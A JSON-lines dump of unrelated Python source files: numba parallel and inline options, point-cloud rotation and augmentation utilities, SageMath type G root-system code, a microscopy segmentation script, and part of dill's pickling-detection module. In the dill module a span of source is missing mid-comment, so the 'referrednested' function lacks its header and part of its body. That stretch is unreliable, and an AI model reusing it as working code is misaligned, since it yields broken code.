value.pop('inplace_binop', True)\n self.setitem = value.pop('setitem', True)\n self.numpy = value.pop('numpy', True)\n self.stencil = value.pop('stencil', True)\n self.fusion = value.pop('fusion', True)\n self.prange = value.pop('prange', True)\n if value:\n msg = \"Unrecognized parallel options: %s\" % value.keys()\n raise NameError(msg)\n elif isinstance(value, ParallelOptions):\n self.enabled = value.enabled\n self.comprehension = value.comprehension\n self.reduction = value.reduction\n self.inplace_binop = value.inplace_binop\n self.setitem = value.setitem\n self.numpy = value.numpy\n self.stencil = value.stencil\n self.fusion = value.fusion\n self.prange = value.prange\n else:\n msg = \"Expect parallel option to be either a bool or a dict\"\n raise ValueError(msg)\n\n\nclass InlineOptions(object):\n \"\"\"\n Options for controlling inlining\n \"\"\"\n\n def __init__(self, value):\n ok = False\n if isinstance(value, str):\n if value in ('always', 'never'):\n ok = True\n else:\n ok = hasattr(value, '__call__')\n\n if ok:\n self._inline = value\n else:\n msg = (\"kwarg 'inline' must be one of the strings 'always' or \"\n \"'never', or it can be a callable that returns True/False. \"\n \"Found value %s\" % value)\n raise ValueError(msg)\n\n @property\n def is_never_inline(self):\n \"\"\"\n True if never inline\n \"\"\"\n return self._inline == 'never'\n\n @property\n def is_always_inline(self):\n \"\"\"\n True if always inline\n \"\"\"\n return self._inline == 'always'\n\n @property\n def has_cost_model(self):\n \"\"\"\n True if a cost model is provided\n \"\"\"\n return not (self.is_always_inline or self.is_never_inline)\n\n @property\n def value(self):\n \"\"\"\n The raw value\n \"\"\"\n return self._inline\n"} {"ext": "py", "sha": "1a305a69c89f7036862c6e0ab50cc0e0a291f95e", "content": "import math\nimport numpy as np\nimport torch\nfrom scipy.spatial import cKDTree\n\n\ndef setup_seed(seed):\n torch.backends.cudnn.deterministic = True\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n np.random.seed(seed)\n\n\ndef square_dists(points1, points2):\n '''\n Calculate square dists between two group points\n :param points1: shape=(B, N, C)\n :param points2: shape=(B, M, C)\n :return:\n '''\n B, N, C = points1.shape\n _, M, _ = points2.shape\n dists = torch.sum(torch.pow(points1, 2), dim=-1).view(B, N, 1) + \\\n torch.sum(torch.pow(points2, 2), dim=-1).view(B, 1, M)\n dists -= 2 * torch.matmul(points1, points2.permute(0, 2, 1))\n #dists = torch.where(dists < 0, torch.ones_like(dists) * 1e-7, dists) # Very Important for dist = 0.\n return dists.float()\n\n\ndef random_select_points(pc, m):\n if m < 0:\n idx = np.arange(pc.shape[0])\n np.random.shuffle(idx)\n return pc[idx, :]\n n = pc.shape[0]\n replace = False if n >= m else True\n idx = np.random.choice(n, size=(m, ), replace=replace)\n return pc[idx, :]\n\n\ndef generate_rotation_x_matrix(theta):\n mat = np.eye(3, dtype=np.float32)\n mat[1, 1] = math.cos(theta)\n mat[1, 2] = -math.sin(theta)\n mat[2, 1] = math.sin(theta)\n mat[2, 2] = math.cos(theta)\n return mat\n\n\ndef generate_rotation_y_matrix(theta):\n mat = np.eye(3, dtype=np.float32)\n mat[0, 0] = math.cos(theta)\n mat[0, 2] = math.sin(theta)\n mat[2, 0] = -math.sin(theta)\n mat[2, 2] = math.cos(theta)\n return mat\n\n\ndef generate_rotation_z_matrix(theta):\n mat = np.eye(3, dtype=np.float32)\n mat[0, 0] = math.cos(theta)\n mat[0, 1] = -math.sin(theta)\n mat[1, 0] = math.sin(theta)\n mat[1, 1] = math.cos(theta)\n return mat\n\n\ndef generate_random_rotation_matrix(angle1=-45, angle2=45):\n thetax = np.random.uniform() * np.pi * angle2 / 180.0\n thetay = np.random.uniform() * np.pi * angle2 / 180.0\n thetaz = np.random.uniform() * np.pi * angle2 / 180.0\n matx = generate_rotation_x_matrix(thetax)\n maty = generate_rotation_y_matrix(thetay)\n matz = generate_rotation_z_matrix(thetaz)\n return np.dot(matx, np.dot(maty, matz))\n\n\ndef generate_random_tranlation_vector(range1=-0.5, range2=0.5):\n tranlation_vector = np.random.uniform(range1, range2, size=(3, )).astype(np.float32)\n return tranlation_vector\n\n\ndef transform(pc, R, t=None):\n pc = np.dot(pc, R.T)\n if t is not None:\n pc = pc + t\n return pc\n\n\ndef batch_transform(batch_pc, batch_R, batch_t=None):\n '''\n\n :param batch_pc: shape=(B, N, 3)\n :param batch_R: shape=(B, 3, 3)\n :param batch_t: shape=(B, 3)\n :return: shape(B, N, 3)\n '''\n transformed_pc = torch.matmul(batch_pc, batch_R.permute(0, 2, 1).contiguous())\n if batch_t is not None:\n transformed_pc = transformed_pc + torch.unsqueeze(batch_t, 1)\n return transformed_pc\n\n\n# The transformation between unit quaternion and rotation matrix is referenced to\n# https://zhuanlan.zhihu.com/p/45404840\n\ndef quat2mat(quat):\n w, x, y, z = quat\n R = np.zeros((3, 3), dtype=np.float32)\n R[0][0] = 1 - 2*y*y - 2*z*z\n R[0][1] = 2*x*y - 2*z*w\n R[0][2] = 2*x*z + 2*y*w\n R[1][0] = 2*x*y + 2*z*w\n R[1][1] = 1 - 2*x*x - 2*z*z\n R[1][2] = 2*y*z - 2*x*w\n R[2][0] = 2*x*z - 2*y*w\n R[2][1] = 2*y*z + 2*x*w\n R[2][2] = 1 - 2*x*x - 2*y*y\n return R\n\n\ndef batch_quat2mat(batch_quat):\n '''\n\n :param batch_quat: shape=(B, 4)\n :return:\n '''\n w, x, y, z = batch_quat[:, 0], batch_quat[:, 1], batch_quat[:, 2], \\\n batch_quat[:, 3]\n device = batch_quat.device\n B = batch_quat.size()[0]\n R = torch.zeros(dtype=torch.float, size=(B, 3, 3)).to(device)\n R[:, 0, 0] = 1 - 2 * y * y - 2 * z * z\n R[:, 0, 1] = 2 * x * y - 2 * z * w\n R[:, 0, 2] = 2 * x * z + 2 * y * w\n R[:, 1, 0] = 2 * x * y + 2 * z * w\n R[:, 1, 1] = 1 - 2 * x * x - 2 * z * z\n R[:, 1, 2] = 2 * y * z - 2 * x * w\n R[:, 2, 0] = 2 * x * z - 2 * y * w\n R[:, 2, 1] = 2 * y * z + 2 * x * w\n R[:, 2, 2] = 1 - 2 * x * x - 2 * y * y\n return R\n\n\ndef mat2quat(mat):\n w = math.sqrt(mat[0, 0] + mat[1, 1] + mat[2, 2] + 1 + 1e-8) / 2\n x = (mat[2, 1] - mat[1, 2]) / (4 * w + 1e-8)\n y = (mat[0, 2] - mat[2, 0]) / (4 * w + 1e-8)\n z = (mat[1, 0] - mat[0, 1]) / (4 * w + 1e-8)\n return w, x, y, z\n\n\ndef jitter_point_cloud(pc, sigma=0.01, clip=0.05):\n N, C = pc.shape\n assert(clip > 0)\n #jittered_data = np.clip(sigma * np.random.randn(N, C), -1*clip, clip).astype(np.float32)\n jittered_data = np.clip(\n np.random.normal(0.0, scale=sigma, size=(N, 3)),\n -1 * clip, clip).astype(np.float32)\n jittered_data += pc\n return jittered_data\n\n\ndef shift_point_cloud(pc, shift_range=0.1):\n N, C = pc.shape\n shifts = np.random.uniform(-shift_range, shift_range, (1, C)).astype(np.float32)\n pc += shifts\n return pc\n\n\ndef random_scale_point_cloud(pc, scale_low=0.8, scale_high=1.25):\n scale = np.random.uniform(scale_low, scale_high, 1)\n pc *= scale\n return pc\n\n\ndef inv_R_t(R, t):\n inv_R = R.permute(0, 2, 1).contiguous()\n inv_t = - inv_R @ t[..., None]\n return inv_R, torch.squeeze(inv_t, -1)\n\n\ndef uniform_2_sphere(num: int = None):\n \"\"\"Uniform sampling on a 2-sphere\n\n Source: https://gist.github.com/andrewbolster/10274979\n\n Args:\n num: Number of vectors to sample (or None if single)\n\n Returns:\n Random Vector (np.ndarray) of size (num, 3) with norm 1.\n If num is None returned value will have size (3,)\n\n \"\"\"\n if num is not None:\n phi = np.random.uniform(0.0, 2 * np.pi, num)\n cos_theta = np.random.uniform(-1.0, 1.0, num)\n else:\n phi = np.random.uniform(0.0, 2 * np.pi)\n cos_theta = np.random.uniform(-1.0, 1.0)\n\n theta = np.arccos(cos_theta)\n x = np.sin(theta) * np.cos(phi)\n y = np.sin(theta) * np.sin(phi)\n z = np.cos(theta)\n return np.stack((x, y, z), axis=-1)\n\n\ndef random_crop(pc, p_keep):\n rand_xyz = uniform_2_sphere()\n centroid = np.mean(pc[:, :3], axis=0)\n pc_centered = pc[:, :3] - centroid\n\n dist_from_plane = np.dot(pc_centered, rand_xyz)\n mask = dist_from_plane > np.percentile(dist_from_plane, (1.0 - p_keep) * 100)\n return pc[mask, :]\n\n\ndef shuffle_pc(pc):\n return np.random.permutation(pc)\n\n\ndef flip_pc(pc, r=0.5):\n if np.random.random() > r:\n pc[:, 1] = -1 * pc[:, 1]\n return pc\n\n\ndef angle(v1: torch.Tensor, v2: torch.Tensor):\n \"\"\"Compute angle between 2 vectors\n\n For robustness, we use the same formulation as in PPFNet, i.e.\n angle(v1, v2) = atan2(cross(v1, v2), dot(v1, v2)).\n This handles the case where one of the vectors is 0.0, since torch.atan2(0.0, 0.0)=0.0\n\n Args:\n v1: (B, *, 3)\n v2: (B, *, 3)\n\n Returns:\n\n \"\"\"\n\n cross_prod = torch.stack([v1[..., 1] * v2[..., 2] - v1[..., 2] * v2[..., 1],\n v1[..., 2] * v2[..., 0] - v1[..., 0] * v2[..., 2],\n v1[..., 0] * v2[..., 1] - v1[..., 1] * v2[..., 0]], dim=-1)\n cross_prod_norm = torch.norm(cross_prod, dim=-1)\n dot_prod = torch.sum(v1 * v2, dim=-1)\n\n return torch.atan2(cross_prod_norm, dot_prod)\n"} {"ext": "py", "sha": "1a305d3908c23751a396191f4d9795628afa0074", "content": "\"\"\"\nRoot system data for type G\n\"\"\"\n#*****************************************************************************\n# Copyright (C) 2008-2009 Daniel Bump\n# Copyright (C) 2008-2009 Justin Walker\n# Copyright (C) 2008-2013 Nicolas M. Thiery \n#\n# Distributed under the terms of the GNU General Public License (GPL)\n# http://www.gnu.org/licenses/\n#*****************************************************************************\nfrom __future__ import print_function\nfrom __future__ import absolute_import\n\nfrom . import ambient_space\nfrom sage.sets.family import Family\nfrom sage.combinat.root_system.root_lattice_realizations import RootLatticeRealizations\nclass AmbientSpace(ambient_space.AmbientSpace):\n \"\"\"\n EXAMPLES::\n\n sage: e = RootSystem(['G',2]).ambient_space(); e\n Ambient space of the Root system of type ['G', 2]\n\n One can not construct the ambient lattice because the simple\n coroots have rational coefficients::\n\n sage: e.simple_coroots()\n Finite family {1: (0, 1, -1), 2: (1/3, -2/3, 1/3)}\n sage: e.smallest_base_ring()\n Rational Field\n\n By default, this ambient space uses the barycentric projection for plotting::\n\n sage: L = RootSystem([\"G\",2]).ambient_space()\n sage: e = L.basis()\n sage: L._plot_projection(e[0])\n (1/2, 989/1142)\n sage: L._plot_projection(e[1])\n (-1, 0)\n sage: L._plot_projection(e[2])\n (1/2, -989/1142)\n sage: L = RootSystem([\"A\",3]).ambient_space()\n sage: l = L.an_element(); l\n (2, 2, 3, 0)\n sage: L._plot_projection(l)\n (0, -1121/1189, 7/3)\n\n .. SEEALSO::\n\n - :meth:`sage.combinat.root_system.root_lattice_realizations.RootLatticeRealizations.ParentMethods._plot_projection`\n\n TESTS::\n\n sage: TestSuite(e).run()\n sage: [WeylDim(['G',2],[a,b]) for a,b in [[0,0], [1,0], [0,1], [1,1]]] # indirect doctest\n [1, 7, 14, 64]\n \"\"\"\n def dimension(self):\n \"\"\"\n EXAMPLES::\n\n sage: e = RootSystem(['G',2]).ambient_space()\n sage: e.dimension()\n 3\n \"\"\"\n return 3\n\n def simple_root(self, i):\n \"\"\"\n EXAMPLES::\n\n sage: CartanType(['G',2]).root_system().ambient_space().simple_roots()\n Finite family {1: (0, 1, -1), 2: (1, -2, 1)}\n \"\"\"\n return self.monomial(1)-self.monomial(2) if i == 1 else self.monomial(0)-2*self.monomial(1)+self.monomial(2)\n def positive_roots(self):\n \"\"\"\n EXAMPLES::\n\n sage: CartanType(['G',2]).root_system().ambient_space().positive_roots()\n [(0, 1, -1), (1, -2, 1), (1, -1, 0), (1, 0, -1), (1, 1, -2), (2, -1, -1)]\n \"\"\"\n return [ self(v) for v in\n [[0,1,-1],[1,-2,1],[1,-1,0],[1,0,-1],[1,1,-2],[2,-1,-1]]]\n\n def negative_roots(self):\n \"\"\"\n EXAMPLES::\n\n sage: CartanType(['G',2]).root_system().ambient_space().negative_roots()\n [(0, -1, 1), (-1, 2, -1), (-1, 1, 0), (-1, 0, 1), (-1, -1, 2), (-2, 1, 1)]\n \"\"\"\n return [ self(v) for v in\n [[0,-1,1],[-1,2,-1],[-1,1,0],[-1,0,1],[-1,-1,2],[-2,1,1]]]\n\n def fundamental_weights(self):\n \"\"\"\n EXAMPLES::\n\n sage: CartanType(['G',2]).root_system().ambient_space().fundamental_weights()\n Finite family {1: (1, 0, -1), 2: (2, -1, -1)}\n \"\"\"\n return Family({ 1: self([1,0,-1]),\n 2: self([2,-1,-1])})\n\n _plot_projection = RootLatticeRealizations.ParentMethods.__dict__['_plot_projection_barycentric']\n\n\nfrom .cartan_type import CartanType_standard_finite, CartanType_simple, CartanType_crystallographic\nclass CartanType(CartanType_standard_finite, CartanType_simple, CartanType_crystallographic):\n def __init__(self):\n \"\"\"\n EXAMPLES::\n\n sage: ct = CartanType(['G',2])\n sage: ct\n ['G', 2]\n sage: ct._repr_(compact = True)\n 'G2'\n\n sage: ct.is_irreducible()\n True\n sage: ct.is_finite()\n True\n sage: ct.is_crystallographic()\n True\n sage: ct.is_simply_laced()\n False\n sage: ct.dual()\n ['G', 2] relabelled by {1: 2, 2: 1}\n sage: ct.affine()\n ['G', 2, 1]\n\n TESTS::\n\n sage: TestSuite(ct).run()\n \"\"\"\n CartanType_standard_finite.__init__(self, \"G\", 2)\n\n def _latex_(self):\n r\"\"\"\n Return a latex representation of ``self``.\n\n EXAMPLES::\n\n sage: latex(CartanType(['G',2]))\n G_2\n sage: latex(CartanType(['G',2]).dual())\n G_2 \\text{ relabelled by } \\left\\{1 : 2, 2 : 1\\right\\}\n \"\"\"\n return \"G_2\"\n\n AmbientSpace = AmbientSpace\n\n def coxeter_number(self):\n \"\"\"\n Return the Coxeter number associated with ``self``.\n\n EXAMPLES::\n\n sage: CartanType(['G',2]).coxeter_number()\n 6\n \"\"\"\n return 6\n\n def dual_coxeter_number(self):\n \"\"\"\n Return the dual Coxeter number associated with ``self``.\n\n EXAMPLES::\n\n sage: CartanType(['G',2]).dual_coxeter_number()\n 4\n \"\"\"\n return 4\n\n def dynkin_diagram(self):\n \"\"\"\n Returns a Dynkin diagram for type G.\n\n EXAMPLES::\n\n sage: g = CartanType(['G',2]).dynkin_diagram()\n sage: g\n 3\n O=<=O\n 1 2\n G2\n sage: sorted(g.edges())\n [(1, 2, 1), (2, 1, 3)]\n \"\"\"\n from .dynkin_diagram import DynkinDiagram_class\n g = DynkinDiagram_class(self)\n g.add_edge(1,2)\n g.set_edge_label(2,1,3)\n return g\n\n def _latex_dynkin_diagram(self, label=lambda i: i, node=None, node_dist=2, dual=False):\n r\"\"\"\n Return a latex representation of the Dynkin diagram.\n\n EXAMPLES::\n\n sage: print(CartanType(['G',2])._latex_dynkin_diagram())\n \\draw (0,0) -- (2 cm,0);\n \\draw (0, 0.15 cm) -- +(2 cm,0);\n \\draw (0, -0.15 cm) -- +(2 cm,0);\n \\draw[shift={(0.8, 0)}, rotate=180] (135 : 0.45cm) -- (0,0) -- (-135 : 0.45cm);\n \\draw[fill=white] (0 cm, 0 cm) circle (.25cm) node[below=4pt]{$1$};\n \\draw[fill=white] (2 cm, 0 cm) circle (.25cm) node[below=4pt]{$2$};\n \n \"\"\"\n if node is None:\n node = self._latex_draw_node\n ret = \"\\\\draw (0,0) -- (%s cm,0);\\n\"%node_dist\n ret += \"\\\\draw (0, 0.15 cm) -- +(%s cm,0);\\n\"%node_dist\n ret += \"\\\\draw (0, -0.15 cm) -- +(%s cm,0);\\n\"%node_dist\n if dual:\n ret += self._latex_draw_arrow_tip(0.5*node_dist+0.2, 0, 0)\n else:\n ret += self._latex_draw_arrow_tip(0.5*node_dist-0.2, 0, 180)\n ret += node(0, 0, label(1))\n ret += node(node_dist, 0, label(2))\n return ret\n\n def ascii_art(self, label=lambda i: i, node=None):\n \"\"\"\n Return an ascii art representation of the Dynkin diagram.\n\n EXAMPLES::\n\n sage: print(CartanType(['G',2]).ascii_art(label=lambda x: x+2))\n 3\n O=<=O\n 3 4\n \"\"\"\n if node is None:\n node = self._ascii_art_node\n ret = \" 3\\n{}=<={}\\n\".format(node(label(1)), node(label(2)))\n return ret + \"{!s:4}{!s:4}\".format(label(1), label(2))\n\n def dual(self):\n r\"\"\"\n Return the dual Cartan type.\n\n This uses that `G_2` is self-dual up to relabelling.\n\n EXAMPLES::\n\n sage: G2 = CartanType(['G',2])\n sage: G2.dual()\n ['G', 2] relabelled by {1: 2, 2: 1}\n\n sage: G2.dynkin_diagram()\n 3\n O=<=O\n 1 2\n G2\n sage: G2.dual().dynkin_diagram()\n 3\n O=<=O\n 2 1\n G2 relabelled by {1: 2, 2: 1}\n \"\"\"\n return self.relabel({1:2, 2:1})\n\n def _default_folded_cartan_type(self):\n \"\"\"\n Return the default folded Cartan type.\n\n EXAMPLES::\n\n sage: CartanType(['G', 2])._default_folded_cartan_type()\n ['G', 2] as a folding of ['D', 4]\n \"\"\"\n from sage.combinat.root_system.type_folded import CartanTypeFolded\n return CartanTypeFolded(self, ['D', 4], [[1, 3, 4], [2]])\n\n# For unpickling backward compatibility (Sage <= 4.1)\nfrom sage.structure.sage_object import register_unpickle_override\nregister_unpickle_override('sage.combinat.root_system.type_G', 'ambient_space', AmbientSpace)\n"} {"ext": "py", "sha": "1a305d494478a6d7d10a37d8e5ef279e975879cb", "content": "import os\nimport glob\n\n# Our numerical workhorses\nimport numpy as np\nimport pandas as pd\nimport scipy.special\n\n# Import the project utils\nimport sys\nsys.path.insert(0, '../')\nimport image_analysis_utils as im_utils\n\n# Useful plotting libraries\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport matplotlib as mpl\nimport seaborn as sns\n\n# Image analysis libraries\nimport skimage.io\nimport skimage.filters\nimport skimage.segmentation\nimport scipy.ndimage\n\n# Set plotting style\nim_utils.set_plotting_style()\n\n#============================================================================== \n# METADATA\n#============================================================================== \n\nDATE = 20161118\nUSERNAME = 'mrazomej'\nOPERATOR = 'O2'\nBINDING_ENERGY = -13.9\nREPRESSORS = (0, 0, 130)\nIPDIST = 0.160 # in units of µm per pixel\nSTRAINS = ['auto', 'delta', 'RBS1027']\nIPTG_RANGE = (0, 0.1, 5, 10, 25, 50, 75, 100, 250, 500, 1000, 5000)\n\n#============================================================================== \n\n# Define the data directory.\ndata_dir = '../../../data/microscopy/' + str(DATE) + '/'\n\n# Glob the profile and noise images.\nyfp_glob = glob.glob(data_dir + '*yfp_profile*/*.tif')\nrfp_glob = glob.glob(data_dir + '*mCherry_profile*/*.tif')\nnoise_glob = glob.glob(data_dir + '*noise*/*.tif')\n\n# Load the images as collections\nyfp_profile = skimage.io.ImageCollection(yfp_glob)\nrfp_profile = skimage.io.ImageCollection(rfp_glob)\nnoise_profile = skimage.io.ImageCollection(noise_glob)\n\n# Need to split the noise profile image into the two channels\nnoise_rfp = [noise_profile[i][0] for i, _ in enumerate(noise_profile)]\nnoise_yfp = [noise_profile[i][1] for i, _ in enumerate(noise_profile)]\n\n# Generate averages and plot them. \nrfp_avg = im_utils.average_stack(rfp_profile)\nyfp_avg = im_utils.average_stack(yfp_profile)\n\nrfp_noise = im_utils.average_stack(noise_rfp)\nyfp_noise = im_utils.average_stack(noise_yfp)\n\nwith sns.axes_style('white'):\n fig, ax = plt.subplots(2, 2, figsize=(6,6))\n ax = ax.ravel()\n ax[0].imshow(yfp_avg, cmap=plt.cm.viridis)\n ax[0].set_title('yfp profile')\n ax[1].imshow(rfp_avg, cmap=plt.cm.plasma)\n ax[1].set_title('rfp profile')\n ax[2].imshow(yfp_noise, cmap=plt.cm.Greens_r)\n ax[2].set_title('yfp noise')\n ax[3].imshow(rfp_noise, cmap=plt.cm.Reds_r)\n ax[3].set_title('rfp noise')\nplt.tight_layout()\nplt.savefig('./outdir/background_correction.png')\n\n#============================================================================== \n\n# Iterate through each strain and concentration to make the dataframes.\ndfs = []\n\n# Select random IPTG and random strain to print the example segmentation\nex_iptg = np.random.choice(IPTG_RANGE)\nex_strain = STRAINS[-1]\n\nfor i, st in enumerate(STRAINS):\n print(st)\n for j, iptg in enumerate(IPTG_RANGE):\n # Load the images\n if (iptg==0) & (st != STRAINS[-1]):\n images = glob.glob(data_dir + '*' + st + '_*/*.tif')\n \n else:\n images = glob.glob(data_dir + '*' + st + '*_' + str(iptg) +\n 'uMIPTG*/*.ome.tif')\n \n if len(images) is not 0:\n ims = skimage.io.ImageCollection(images)\n # Select random image to print example segmentation\n ex_no = np.random.choice(np.arange(0, len(images) - 1)) \n \n for z, x in enumerate(ims):\n _, m, y = im_utils.ome_split(x)\n y_flat = im_utils.generate_flatfield(y, yfp_noise, yfp_avg)\n \n # Segment the mCherry channel.\n m_seg = im_utils.log_segmentation(m, label=True)\n\n # Print example segmentation for the random image\n if (st==ex_strain) & (iptg == ex_iptg) & (z == ex_no):\n merge = im_utils.example_segmentation(m_seg, _, 10/IPDIST)\n skimage.io.imsave('./outdir/example_segmentation.png', merge)\n\n # Extract the measurements.\n im_df = im_utils.props_to_df(m_seg, physical_distance=IPDIST,\n intensity_image=y_flat)\n \n # Add strain and IPTG concentration information.\n im_df.insert(0, 'IPTG_uM', iptg)\n im_df.insert(0, 'repressors', REPRESSORS[i])\n im_df.insert(0, 'rbs', st)\n im_df.insert(0, 'binding_energy', BINDING_ENERGY)\n im_df.insert(0, 'operator', OPERATOR)\n im_df.insert(0, 'username', USERNAME)\n im_df.insert(0, 'date', DATE)\n \n # Append the dataframe to the global list.\n dfs.append(im_df)\n\n# Concatenate the dataframe\ndf_im = pd.concat(dfs, axis=0)\ndf_im.to_csv('./outdir/' + str(DATE) + '_' + OPERATOR + '_' +\\\n STRAINS[-1] + '_raw_segmentation.csv', index=False)\n\n"} {"ext": "py", "sha": "1a305d589fd99a0bec3c4029563e5f8162b0535a", "content": "#!/usr/bin/env python\n#\n# Author: Mike McKerns (mmckerns @caltech and @uqfoundation)\n# Copyright (c) 2008-2016 California Institute of Technology.\n# Copyright (c) 2016-2019 The Uncertainty Quantification Foundation.\n# License: 3-clause BSD. The full license text is available at:\n# - https://github.com/uqfoundation/dill/blob/master/LICENSE\n\"\"\"\nMethods for detecting objects leading to pickling failures.\n\"\"\"\n\nimport dis\nfrom inspect import ismethod, isfunction, istraceback, isframe, iscode\nfrom .pointers import parent, reference, at, parents, children\n\nfrom ._dill import _trace as trace\nfrom ._dill import PY3\n\n__all__ = ['baditems','badobjects','badtypes','code','errors','freevars',\n 'getmodule','globalvars','nestedcode','nestedglobals','outermost',\n 'referredglobals','referrednested','trace','varnames']\n\ndef getmodule(object, _filename=None, force=False):\n \"\"\"get the module of the object\"\"\"\n from inspect import getmodule as getmod\n module = getmod(object, _filename)\n if module or not force: return module\n if PY3: builtins = 'builtins'\n else: builtins = '__builtin__'\n builtins = __import__(builtins)\n from .source import getname\n name = getname(object, force=True)\n return builtins if name in vars(builtins).keys() else None\n\ndef outermost(func): # is analogous to getsource(func,enclosing=True)\n \"\"\"get outermost enclosing object (i.e. the outer function in a closure)\n\n NOTE: this is the object-equivalent of getsource(func, enclosing=True)\n \"\"\"\n if PY3:\n if ismethod(func):\n _globals = func.__func__.__globals__ or {}\n elif isfunction(func):\n _globals = func.__globals__ or {}\n else:\n return #XXX: or raise? no matches\n _globals = _globals.items()\n else:\n if ismethod(func):\n _globals = func.im_func.func_globals or {}\n elif isfunction(func):\n _globals = func.func_globals or {}\n else:\n return #XXX: or raise? no matches\n _globals = _globals.iteritems()\n # get the enclosing source\n from .source import getsourcelines\n try: lines,lnum = getsourcelines(func, enclosing=True)\n except: #TypeError, IOError\n lines,lnum = [],None\n code = ''.join(lines)\n # get all possible names,objects that are named in the enclosing source\n _locals = ((name,obj) for (name,obj) in _globals if name in code)\n # now only save the objects that generate the enclosing block\n for name,obj in _locals: #XXX: don't really need 'name'\n try:\n if getsourcelines(obj) == (lines,lnum): return obj\n except: #TypeError, IOError\n pass\n return #XXX: or raise? no matches\n\ndef nestedcode(func, recurse=True): #XXX: or return dict of {co_name: co} ?\n \"\"\"get the code objects for any nested functions (e.g. in a closure)\"\"\"\n func = code(func)\n if not iscode(func): return [] #XXX: or raise? no matches\n nested = set()\n for co in func.co_consts:\n if co is None: continue\n co = code(co)\n if co:\n nested.add(co)\n if recurse: nested |= set(nestedcode(co, recurse=True))\n return list(nested)\n\ndef code(func):\n '''get the code object for the given function or method\n\n NOTE: use dill.source.getsource(CODEOBJ) to get the source code\n '''\n if PY3:\n im_func = '__func__'\n func_code = '__code__'\n else:\n im_func = 'im_func'\n func_code = 'func_code'\n if ismethod(func): func = getattr(func, im_func)\n if isfunction(func): func = getattr(func, func_code)\n if istraceback(func): func = func.tb_frame\n if isframe(func): func = func.f_code\n if iscode(func): return func\n return\n\n#XXX: ugly: parse dis.dis for name after \" len(referrednested(func)), try calling func().\n If possible, python builds code objects, but delays building functions\n until func() is called.\n \"\"\"\n if PY3:\n att1 = '__code__'\n att0 = '__func__'\n else:\n att1 = 'func_code' # functions\n att0 = 'im_func' # methods\n\n import gc\n funcs = set()\n # get the code objects, and try to track down by referrence\n for co in nestedcode(func, recurse):\n # look for function objects that refer to the code object\n for obj in gc.get_referrers(co):\n # get methods\n _ = getattr(obj, att0, None) # ismethod\n if getattr(_, att1, None) is co: funcs.add(obj)\n # get functions\n elif getattr(obj, att1, None) is co: funcs.add(obj)\n # get frame objects\n elif getattr(obj, 'f_code', None) is co: funcs.add(obj)\n # get code objects\n elif hasattr(obj, 'co_code') and obj is co: funcs.add(obj)\n# frameobjs => func.func_code.co_varnames not in func.func_code.co_cellvars\n# funcobjs => func.func_code.co_cellvars not in func.func_code.co_varnames\n# frameobjs are not found, however funcobjs are...\n# (see: test_mixins.quad ... and test_mixins.wtf)\n# after execution, code objects get compiled, and then may be found by gc\n return list(funcs)\n\n\ndef freevars(func):\n \"\"\"get objects defined in enclosing code that are referred to by func\n\n returns a dict of {name:object}\"\"\"\n if PY3:\n im_func = '__func__'\n func_code = '__code__'\n func_closure = '__closure__'\n else:\n im_func = 'im_func'\n func_code = 'func_code'\n func_closure = 'func_closure'\n if ismethod(func): func = getattr(func, im_func)\n if isfunction(func):\n closures = getattr(func, func_closure) or ()\n func = getattr(func, func_code).co_freevars # get freevars\n else:\n return {}\n return dict((name,c.cell_contents) for (name,c) in zip(func,closures))\n\n# thanks to Davies Liu for recursion of globals\ndef nestedglobals(func, recurse=True):\n \"\"\"get the names of any globals found within func\"\"\"\n func = code(func)\n if func is None: return list()\n from .temp import capture\n names = set()\n with capture('stdout') as out:\n dis.dis(func) #XXX: dis.dis(None) disassembles last traceback\n for line in out.getvalue().splitlines():\n if '_GLOBAL' in line:\n name = line.split('(')[-1].split(')')[0]\n names.add(name)\n for co in getattr(func, 'co_consts', tuple()):\n if co and recurse and iscode(co):\n names.update(nestedglobals(co, recurse=True))\n return list(names)\n\ndef referredglobals(func, recurse=True, builtin=False):\n \"\"\"get the names of objects in the global scope referred to by func\"\"\"\n return globalvars(func, recurse, builtin).keys()\n\ndef globalvars(func, recurse=True, builtin=False):\n \"\"\"get objects defined in global scope that are referred to by func\n\n return a dict of {name:object}\"\"\"\n if PY3:\n im_func = '__func__'\n func_code = '__code__'\n func_globals = '__globals__'\n func_closure = '__closure__'\n else:\n im_func = 'im_func'\n func_code = 'func_code'\n func_globals = 'func_globals'\n func_closure = 'func_closure'\n if ismethod(func): func = getattr(func, im_func)\n if isfunction(func):\n globs = vars(getmodule(sum)).copy() if builtin else {}\n # get references from within closure\n orig_func, func = func, set()\n for obj in getattr(orig_func, func_closure) or {}:\n _vars = globalvars(obj.cell_contents, recurse, builtin) or {}\n func.update(_vars) #XXX: (above) be wary of infinte recursion?\n globs.update(_vars)\n # get globals\n globs.update(getattr(orig_func, func_globals) or {})\n # get names of references\n if not recurse:\n func.update(getattr(orig_func, func_code).co_names)\n else:\n func.update(nestedglobals(getattr(orig_func, func_code)))\n # find globals for all entries of func\n for key in func.copy(): #XXX: unnecessary...?\n nested_func = globs.get(key)\n if nested_func is orig_func:\n #func.remove(key) if key in func else None\n continue #XXX: globalvars(func, False)?\n func.update(globalvars(nested_func, True, builtin))\n elif iscode(func):\n globs = vars(getmodule(sum)).copy() if builtin else {}\n #globs.update(globals())\n if not recurse:\n func = func.co_names # get names\n else:\n orig_func = func.co_name # to stop infinite recursion\n func = set(nestedglobals(func))\n # find globals for all entries of func\n for key in func.copy(): #XXX: unnecessary...?\n if key is orig_func:\n #func.remove(key) if key in func else None\n continue #XXX: globalvars(func, False)?\n nested_func = globs.get(key)\n func.update(globalvars(nested_func, True, builtin))\n else:\n return {}\n #NOTE: if name not in func_globals, then we skip it...\n return dict((name,globs[name]) for name in func if name in globs)\n\n\ndef varnames(func):\n \"\"\"get names of variables defined by func\n\n returns a tuple (local vars, local vars referrenced by nested functions)\"\"\"\n func = code(func)\n if not iscode(func):\n return () #XXX: better ((),())? or None?\n return func.co_varnames, func.co_cellvars\n\n\ndef baditems(obj, exact=False, safe=False): #XXX: obj=globals() ?\n \"\"\"get items in object that fail to pickle\"\"\"\n if not hasattr(obj,'__iter__'): # is not iterable\n return [j for j in (badobjects(obj,0,exact,safe),) if j is not None]\n obj = obj.values() if getattr(obj,'values',None) else obj\n _obj = [] # can't use a set, as items may be unhashable\n [_obj.append(badobjects(i,0,exact,safe)) for i in obj if i not in _obj]\n return [j for j in _obj if j is not None]\n\n\ndef badobjects(obj, depth=0, exact=False, safe=False):\n \"\"\"get objects that fail to 